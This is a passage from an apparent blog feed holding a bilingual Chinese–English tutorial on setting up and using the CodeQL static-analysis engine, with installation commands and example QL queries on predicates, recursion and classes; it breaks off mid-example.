ret.<span class="built_in">getEnclosingFunction</span>() <span class="keyword">and</span></span><br><span class="line">  <span class="comment">/* 数据流源头被设置为FunctionCall位置 */</span></span><br><span class="line">  source.<span class="built_in">asExpr</span>() = call <span class="keyword">and</span> </span><br><span class="line">  <span class="comment">/* 数据流终点被设置为存在类型转换的位置 */</span></span><br><span class="line">  sink.<span class="built_in">asExpr</span>().<span class="built_in">getFullyConverted</span>().<span class="built_in">getType</span>().<span class="built_in">getUnderlyingType</span>().(IntegralType).<span 
class="built_in">isUnsigned</span>() <span class="keyword">and</span></span><br><span class="line">  DataFlow::<span class="built_in">localFlow</span>(source, sink)</span><br><span class="line">select source, sink</span><br></pre></td></tr></table></figure></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/github/securitylab/tree/main/CodeQL_Queries/cpp&quot;&gt;GitHub Security Lab&lt;/a&gt; hosts a number of example CodeQL queries.&lt;/p&gt;
&lt;p&gt;Studying these examples deepens our understanding of CodeQL so that we can use it more effectively.&lt;/p&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="CodeQL" scheme="https://kiprey.github.io/tags/CodeQL/"/>
    
  </entry>
  
  <entry>
    <title>Getting Started with CodeQL</title>
    <link href="https://kiprey.github.io/2020/12/CodeQL-Setup/"/>
    <id>https://kiprey.github.io/2020/12/CodeQL-Setup/</id>
    <published>2020-12-06T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.783Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>CodeQL 是一个语义代码分析引擎，它可以扫描发现代码库中的漏洞。使用 CodeQL，可以像对待数据一样查询代码。编写查询条件以查找漏洞的所有变体并处理，同时可以分享个人查询条件。</p><span id="more"></span><p>编写该文章时，主要参考了官方文档 - <a href="https://help.semmle.com/QL/ql-handbook/index.html#">QL language reference</a></p><h2 id="二、环境搭建">二、环境搭建</h2><blockquote><p>环境搭建整体参考 <a href="https://paper.seebug.org/1078/">代码分析引擎 CodeQL 初体验</a></p></blockquote><ul><li><p>首先，下载一下<code>CodeQL CLI</code>二进制文件并安装</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下载codeql.zip</span></span><br><span class="line">wget https://github.com/github/codeql-cli-binaries/releases/latest/download/codeql.zip</span><br><span class="line"><span class="comment"># 解压</span></span><br><span class="line">unzip codeql.zip</span><br><span class="line"><span class="comment"># 将codeql添加至path中</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;export PATH=\$PATH:/usr/class/codeql&quot;</span> &gt;&gt; ~/.zshrc</span><br><span class="line"><span class="built_in">source</span> ~/.zshrc</span><br></pre></td></tr></table></figure></li><li><p>由于是入门，我们只需要使用初始工作区（starter workspace）就好，因此执行以下命令</p><blockquote><p>工作区配置参考——<a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/setting-up.html#using-the-starter-workspace">Using the starter workspace</a></p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> --recursive 
git@github.com:github/vscode-codeql-starter.git</span><br></pre></td></tr></table></figure><blockquote><p>注意：该工作区内含了QL库，因此一定要使用递归方式来下拉工作区代码。</p><p>递归方式下拉该仓库后，我们不需要再下拉<code>https://github.com/Semmle/ql</code>这个库了。</p></blockquote><p>如果觉得下拉很慢，可以挂个代理</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 设置代理</span></span><br><span class="line">git config --global http.proxy &lt;Protocol&gt;://&lt;IP&gt;:&lt;PORT&gt;</span><br><span class="line"><span class="comment"># 取消代理</span></span><br><span class="line">git config --global --<span class="built_in">unset</span> http.proxy</span><br></pre></td></tr></table></figure></li><li><p>最后，我们还需要在VScode中下载CodeQL的插件——<a href="https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql">Visual Studio Code Marketplace</a>。</p><p>插件下载完成后，还需要在vscode中设置一下<code>Code QL -- Cli: Executable Path</code>为刚刚下载下来的<code>codeql</code>二进制文件执行路径。</p></li><li><p>上述操作完成后，我们需要先建立一个AST数据库，后续的查询操作等都是在该数据库中完成。</p><p>以C++代码为例，我们可以使用如下命令来建立一个数据库</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">codeql database create &lt;database-folder&gt; --language=cpp --<span class="built_in">command</span>=&lt;prefix <span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure><blockquote><p>如果省略<code>--command</code>参数，则codeQL会自动检测并使用自己的工具来构建。</p><p>但还是强烈推荐使用自己自定义的参数，尤其是大项目时。</p></blockquote><p>以构建chrome为例，由于chrome项目过于庞大，因此我们只能针对某个模块来进行分析。</p><p>于是我们可以进行如下操作</p><ul><li><p>先完整编译一个chromium，release不带符号即可。</p></li><li><p>进入obj目录，将目标模块的obj删除。</p></li><li><p>执行以下命令，重新编译该模块并构建数据库即可。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">gn gen out/ql &amp;&amp; codeql database create &lt;targetFolder&gt; --language=cpp --command=<span class="string">&#x27;ninja -C out/ql chrome&#x27;</span></span><br></pre></td></tr></table></figure></li></ul><p>The resulting database has the following directory layout:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- log\                # log output</span><br><span class="line">- db-cpp\             # the compiled database</span><br><span class="line">- src.zip             # the source code the database was built from</span><br><span class="line">- codeql-database.yml # database configuration</span><br></pre></td></tr></table></figure></li><li><p>Then, in VS Code:</p><ul><li>Click “Open Workspace” to open the <code>vscode-codeql-starter</code> workspace cloned earlier.</li><li>In the CodeQL extension, open the database that was just generated.</li><li>Write your own CodeQL script and save it under <code>vscode-codeql-starter\codeql-custom-queries-cpp</code> so that imported modules resolve correctly.</li><li>Open the QL script in VS Code, then click <code>Run on queue</code> in the CodeQL extension to start the query.</li></ul></li><li><p>To view the AST of a file, right-click the target source file and choose <code>CodeQL: View AST</code>. The first run is slow; expect to wait about ten minutes.</p></li></ul><blockquote><p>CodeQL usage reference - <a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/using-extension.html">Analyzing projects with CodeQL</a></p></blockquote><h2 id="三、基本语法">III. Basic Syntax</h2><blockquote><p>The basic syntax is explained alongside QL code.</p></blockquote><ul><li><p>This query outputs every empty block statement.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// First, import a package from the QL library</span></span><br><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="comment">// 
Restrict the range to every BlockStmt, i.e. every block statement</span></span><br><span class="line">from BlockStmt b</span><br><span class="line"><span class="comment">// Keep only the blocks that contain 0 statements (i.e. empty blocks)</span></span><br><span class="line">where b.<span class="built_in">getNumStmt</span>() = <span class="number">0</span></span><br><span class="line"><span class="comment">// Output each empty block found, together with the string that follows</span></span><br><span class="line">select b, <span class="string">&quot;This is an empty block.&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>The following QL code locates the definitions of specific macros.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Macro m</span><br><span class="line">where m.<span class="built_in">getName</span>() = <span class="string">&quot;_LIBCPP_NO_CFI&quot;</span></span><br><span class="line">  <span class="keyword">or</span> m.<span class="built_in">getName</span>() = <span class="string">&quot;_GLIBC_LIKELY&quot;</span></span><br><span class="line">select m,<span class="string">&quot;macro&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>The following code finds the functions that have a specific name.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function 
named memcpy&quot;</span></span><br></pre></td></tr></table></figure><p>That is nothing special; the key is the next piece of QL code.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall call, Function func</span><br><span class="line">where</span><br><span class="line">    call.<span class="built_in">getTarget</span>() = func <span class="keyword">and</span></span><br><span class="line">    func.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select call,<span class="string">&quot;func named memcpy and called&quot;</span></span><br></pre></td></tr></table></figure><p><code>FunctionCall</code> covers every function call, so we can use it to find where a specific function is called.</p></li></ul><blockquote><p>For any class or function, you can Ctrl + right-click it to view its source and learn more.</p></blockquote><h2 id="四、高级语法">IV. Advanced Syntax</h2><h3 id="1-谓词">1. Predicates</h3><h4 id="a-概述">a. 
Overview</h4><ul><li><p>In CodeQL, functions are not called “functions”; they are called <code>Predicates</code>. For ease of explanation, the text below may still use the word <strong>function</strong>, so <strong>“function”</strong> and <strong>“predicate”</strong> refer to the same thing.</p></li><li><p>Before using a predicate, we need to define it. A predicate has the following form:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">name</span><span class="params">(type arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  statements</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>A predicate definition has four parts:</p><ul><li>The keyword <code>predicate</code> (if there is no return value), or the type of the result (if the predicate returns a value)</li><li>The name of the predicate</li><li>The parameter list of the predicate</li><li>The body of the predicate</li></ul></li></ul><h4 id="b-无返回值的谓词">b. Predicates without a result</h4><ul><li><p>A predicate without a result starts with the <code>predicate</code> keyword. If a value passed in satisfies the logic in the predicate body, the predicate keeps that value.</p></li><li><p>Predicates without a result are used less widely, but they still play an important role in some cases; their uses are covered gradually below.</p></li><li><p>Note that the parameter <code>i</code> is a <strong>set of values</strong>.</p></li><li><p>A simple example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">isSmall</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  i in [<span class="number">1</span> .. 
<span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">from <span class="type">int</span> i </span></span><br><span class="line"><span class="function">where <span class="title">isSmall</span><span class="params">(i)</span> <span class="comment">// narrows i from the infinite set of all integers down to 1-9</span></span></span><br><span class="line"><span class="function">select i</span></span><br><span class="line"><span class="function"><span class="comment">// outputs the numbers 1-9</span></span></span><br></pre></td></tr></table></figure><p>If <code>i</code> is a positive integer less than 10, <code>isSmall(i)</code> holds; the set of values for <code>i</code> therefore keeps only the values that satisfy the condition, and all other values are discarded.</p></li></ul><h4 id="c-带返回值的谓词">c. Predicates with a result</h4><ul><li><p>When a predicate needs to return a result, it does not use a return statement as C/C++ does; it uses the special variable <code>result</code>.</p></li><li><p>A simple example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">getSuccessor</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// If i is within 1-9, return i+1</span></span><br><span class="line">  <span class="comment">// Note: do not read this syntax as if it were C++</span></span><br><span class="line">  result = i + <span class="number">1</span> <span class="keyword">and</span> i in [<span class="number">1</span> .. 
<span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">3</span>)  <span class="comment">// outputs 4</span></span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">33</span>) <span class="comment">// as a separate query (one select per query): outputs nothing</span></span><br></pre></td></tr></table></figure><blockquote><p>The syntax of a predicate body only expresses logical relations, so be sure not to read it the way you would read an ordinary programming language.</p></blockquote></li><li><p>Inside the predicate body, the <code>result</code> variable can be used like any other variable; the only difference is that the data in it is returned.</p><p>In addition, <strong>a predicate may return several results, or no result at all</strong>. Here is a simple example.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Germany&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">    <span 
class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;France&quot;</span>)</span><br><span class="line"><span class="comment">// Returns two entries: &quot;Belgium&quot; and &quot;Germany&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>A predicate must describe a <strong>finite</strong> set of values; a predicate whose result set could be infinite is rejected. For example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// This predicate causes a compilation error</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">multiplyBy4</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// i ranges over a set of values, and that set may be **infinite**</span></span><br><span class="line">  <span class="comment">// result is defined as i*4, so the set of results may be **infinite** as well</span></span><br><span class="line">  result = i * <span class="number">4</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If we still need to define a predicate of this kind, we have to <strong>bound the set of values</strong> by adding a <code>bindingset</code> annotation. In the example below, the annotation states that the predicate <code>plusOne</code> describes a finite set, provided that <code>x</code> or <code>y</code> is bound to a finite set of values.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td 
class="code"><pre><span class="line">bindingset[x] bindingset[y]</span><br><span class="line"><span class="function">predicate <span class="title">plusOne</span><span class="params">(<span class="type">int</span> x, <span class="type">int</span> y)</span> </span>&#123;</span><br><span class="line">  x + <span class="number">1</span> = y</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from <span class="type">int</span> x, <span class="type">int</span> y</span><br><span class="line">where y = <span class="number">42</span> <span class="keyword">and</span> <span class="built_in">plusOne</span>(x, y)</span><br><span class="line">select x, y</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-递归">d. 递归</h4><ul><li><p>谓词类似于函数，可以<strong>递归调用</strong>。</p><p>同时<code>result</code>变量可以按照任何方式来表达与其他变量之间的关系，因此<code>result</code>变量的赋值不局限于使用<code>=</code>符号。</p><p>以下是一个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span 
class="string">&quot;Germany&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="built_in">getANeighbor</span>(result)</span><br><span class="line">&#125;</span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;Austria&quot;</span>)</span><br><span class="line"><span class="comment">// 输出Germany</span></span><br></pre></td></tr></table></figure></li><li><p>传递闭包</p><blockquote><p>谓词的传递闭包是递归谓词，它的结果是通过重复应用原始的谓词来获得的。</p><p>特别要注意的是，原始谓词必须有两个参数(可能包括this或result值)，并且这些参数必须具有兼容的类型。</p><p>由于传递闭包是递归的一种常见形式，因此QL有两个有用的缩写，分别是<code>+</code>和<code>*</code></p></blockquote><ul><li><p><strong>传递闭包(+)</strong></p><p>如果要一次或多次的应用特定谓词，请在谓词后添加一个<code>+</code>符号。</p><p>举个例子，假设定义了一个带有成员谓词<code>getAParent()</code>的<code>Person</code>类，其中<code>p.getAParent()</code>会返回p的所有父母。而<code>p.getAParent+()</code>将会返回p的父母、p的父母的父母、等等等等。</p><p>使用<code>+</code>来表示通常会比显式定义递归谓词更简单，<code>p.getAParent+()</code>等价于以下递归谓词：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span>.<span 
class="built_in">getAParent</span>()</span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><strong>Reflexive transitive closure (*)</strong></p><p>This is similar to the transitive closure above. The difference is that <code>*</code> applies the predicate <strong>zero</strong> or more times, so the starting value itself is included in the result.</p><p>For example, <code>p.getAParent*()</code> returns the ancestors of p, or p itself. The call is equivalent to the following predicate:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor2</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor2</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><blockquote><p>Reference: <a href="https://help.semmle.com/QL/ql-handbook/predicates.html">Predicates - QL language reference</a></p></blockquote><h3 id="2-类">2. 
Classes</h3><ul><li><p>Take the classes used in the QL queries above (the Function class, for example): each of them gathers one particular kind of code element in one place so that later queries can use it. How do we define a class of our own?</p><blockquote><p>A class in CodeQL <strong>does not create a new object</strong>; it only denotes a set of values of a particular kind. Keep this distinction in mind.</p></blockquote></li><li><p>A class definition consists of four parts:</p><ul><li><p>The keyword <code>class</code></p></li><li><p>A class name, which must start with an uppercase letter.</p></li><li><p>The type or types the class is derived from</p><blockquote><p>Besides the classes defined in the cpp package, the available base types include the primitive types <code>boolean</code>, <code>float</code>, <code>int</code>, <code>string</code> and <code>date</code>.</p></blockquote></li><li><p>The class body</p></li></ul></li><li><p>Here is a simple example, taken from the official documentation.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member 
predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">2</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from OneTwoThree i </span><br><span class="line">where i = <span class="number">1</span> <span class="keyword">or</span> i.<span class="built_in">getAString</span>() = <span class="string">&quot;One, two or three: 2&quot;</span></span><br><span class="line">select i</span><br><span class="line"><span class="comment">// Outputs 1 and 2</span></span><br></pre></td></tr></table></figure><ul><li><p>The <strong>characteristic predicate</strong> looks like a C++ class constructor; it further restricts the set of values that the class represents. Take the characteristic predicate above:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">  <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>It narrows the set of values from the original <code>int</code> set down to the range 1-3.</p><p>The <code>this</code> variable stands for the values contained in the current class. Like the <code>result</code> variable, <code>this</code> is used to express relations between sets of values.</p></li><li><p>A keyword that is used frequently in characteristic predicates is <a href="https://help.semmle.com/QL/ql-handbook/formulas.html#exists">exists</a>. Its syntax is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula&gt;)</span><br><span class="line"><span class="comment">// The following two exists forms are equivalent.</span></span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; | &lt;formula <span class="number">2</span>&gt;)</span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; <span class="keyword">and</span> &lt;formula <span class="number">2</span>&gt;)</span><br></pre></td></tr></table></figure><p>This keyword introduces some new variables. The <code>exists</code> formula holds if at least one assignment of values to those variables makes the formula in its body hold.</p><p>A simple example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span 
class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 对于MacroInvocation这个大类的数据集合来说，</span></span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            <span class="comment">// 如果存在宏调用，其宏名称满足特定正则表达式</span></span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="comment">// 将这类数据保存至当前类中</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>与之对应的还有成员谓词，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title 
class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">2</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">select <span class="number">1.</span>(OneTwoThree).<span class="built_in">getAString</span>() <span class="comment">// Outputs &quot;One, two or three: 1&quot;</span></span><br><span class="line"><span class="comment">//select 4.(OneTwoThree).getAString() // no output</span></span><br></pre></td></tr></table></figure><p>Here, <code>1.(OneTwoThree).getAString()</code> casts the <code>int</code> value 1 to the <code>OneTwoThree</code> type. <strong>Values that do not satisfy the constraints of the <code>OneTwoThree</code> class are discarded by the cast</strong>. Consequently <code>4.(OneTwoThree).getAString()</code> produces no output, because the integer 4 is dropped during the cast.</p></li></ul></li><li><p>As in C++, a CodeQL class can declare fields, as the following example shows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SmallInt</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">SmallInt</span>() &#123; <span class="keyword">this</span> = [<span class="number">1</span> .. 
